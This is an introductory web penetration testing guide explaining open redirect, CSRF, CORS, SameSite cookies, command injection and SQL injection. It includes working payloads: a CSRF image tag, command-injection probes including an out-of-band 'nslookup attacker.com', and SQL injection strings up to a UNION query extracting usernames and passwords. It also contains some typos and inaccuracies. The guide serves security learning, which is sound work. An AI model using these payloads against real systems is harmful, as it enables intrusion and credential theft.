Web penetration testing guide

Open Redirect Vulnerability

Open Redirect means when a website redirects user to some other website or domain for a particular task.Vulnerability occurs when we put no checks on the redirect parameter so the victim can be redirected to any website and it will still look valid. For example in this case redirect_to is the parameter to look for.

CSRF Attacks

A CSRF Attack occurs when a attacker uses HTTP request to get a users information and then use that information to act on the users behalf. For example if a user clicks on a malicious link that leads to a HTTP get request to his already logged in bank account leading to money transfer from his account to the attackers account.The way malicious link exploits his bank depends on whether the banking site accepts GET or POST requests.

The secure and httponly attributes tell the browser how the cookies should be sent and read.If a cookie contains secure attribute browsers will only sent this cookie with HTTPS connections. The httponly attribute tells the browser that the cookie can only be read through HTTP and HTTPS requests.If a cookie is httponly browsers wont allow any scripting language such as javascript to read its value.

CSRF with GET Requests

If the site accepts the GET requests then the link will contain a hidden form or an <img> tag.When the <img> tag is rendered by the browser it will make the HTTP GET request to the src tag. So, if the malicious site were to use a URL that transferred $500 from Bob to Joe that looked like: https://www.bank.com/transfer?from=bob&to=joe&amount=500 then a malicious image tag would use this URL as its source value, like in the following tag:<img src="https://www.bank.com/transfer?from=bob&to=joe&amount=500">

CSRF with POST Requests

The simplistic thing we can do is change the content-type header to plain/text;charset=UFT-8.This will allow attacker to submit a HTML to target site without victim becoming aware.

Websites use CSRF token to protect against these attacks.The websites generates two tokens, one is given to the users browser and the other one is kept by the website.Both can be compared when needed to.

A CSRF attack is possible if

• A attacker wants to make a privileged action i.e. changing password of a victim
• If a website only relies on cookie based session handling for authentication.
• There are no unpredictable parameters(in the url) involved i.e. those which cannot be guessed.

CSRF tokens are unique and unpredictable value generated by the server which is given to the client to include it in future requests to prevent CSRF attacks.

• Server sends client a token
• Client submits the form with token
• The server rejects the request if the token is invalid

This is the mechanism through which browser decides whether to share resources with another (different) domain or not.It is a HTTP header. CORS is a security mechanism that allows a web page from one domain or Origin to access a resource with a different domain (a cross-domain request). Access-Control-Allow-Origin header in the HTTP protocol indicates what kind of domains are allowed to access a certain resource.

It is important to understand CORS before working on CSRF.

SameSite Cookie

SameSite cookie is another mechanism which is used to prevent csrf attacks.The samesite attribute is added in the set-cookie response header ; the attribute can be given two values : Strict or Lax.If the value is strict then the browser will not include cookie in the request that originates from some other site.

Command Injection

Command injection as known as shell injection occurs when a user input leads to commands being executed on the server side.Attacker is able to execute commands like whoami or ifconfig depending on the type of system the website is hosted.

Note that in order to find the command injection vulnerability we have to check every possible parameter in a particular url

Blind injection occurs when the commands are executed on the system but there is no output given to the end user.

• To detect this type of vulnerability we can us the following ping command.& ping -c 10 [target ip] & causing the website to continuously ping the ip address which in most cases is its loop back interface.
• Another way to detect blind injection is by redirecting the output. For example & whoami > /var/www/static/whoami.txt & After this we can redirect our browser to confirm that output.
• Another way to detect this type of vulnerability is by using out-of-band technique which means we will input a command which will trigger a network interaction of the web server with the machine we own. For example & nslookup attacker.com

SQL Injection

SQL injection attack is when an attacker is able to compromise a website or server through SQL queries.These can lead to sensitive data exposure.

There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:

1=1 is always true so this payload will return all the product categories.

We can retrieve hidden data by changing a url which in return will change SQL query on the back end resulting in data leakage.For example GET /filter?category=Gifts'+OR+1=1-- HTTP/1.1 returning all the available categories as we are using the OR 1=1 which means categories will always return true leading to leakage of all categories.

Suppose we use the administrator'-- payload in the the login user name so as a result the application will ignore the password field.

SQL union attacks involve tempering with the queries that are returned in application responses as a result we get SQL tables.This is done by using the UNION keyword which allows us to execute additional select queries along with the original one. For a UNION query to work, two key requirements must be met:

• The individual queries must return the same number of columns.
• The data types in each column must be compatible between the individual queries.

The query after the union should have same number of column as query coming before. Also the data type of each column should be same with one another.

The first step of such an attack is to determine the number of columns that are being returned by the original query. To do this use NULL in the injection site GET /filter?category=Accessories'+UNION+SELECT+NULL,NULL,NULL-- until the server 500 error turns into 200 OK response indicating the application is vulnerable.The reason for using NULL as the values returned from the injected SELECT query is that the data types in each column must be compatible between the original and the injected queries. Since NULL is convertible to every commonly used data type, using NULL maximizes the chance that the payload will succeed when the column count is correct.

To find which column can hold string data , replace each NULL with a string to see the response 200 OK. For example GET /filter?category=Corporate+gifts'+UNION+SELECT+NULL,'rqk60W',NULL-- HTTP/1.1

In case if we know the tables and column names we can use this type of payloads GET /filter?category=Corporate+gifts'+UNION+SELECT+username,+password+FROM+users--

In blind SQL the results of payload are not returned i.e. there is not query related response from the app.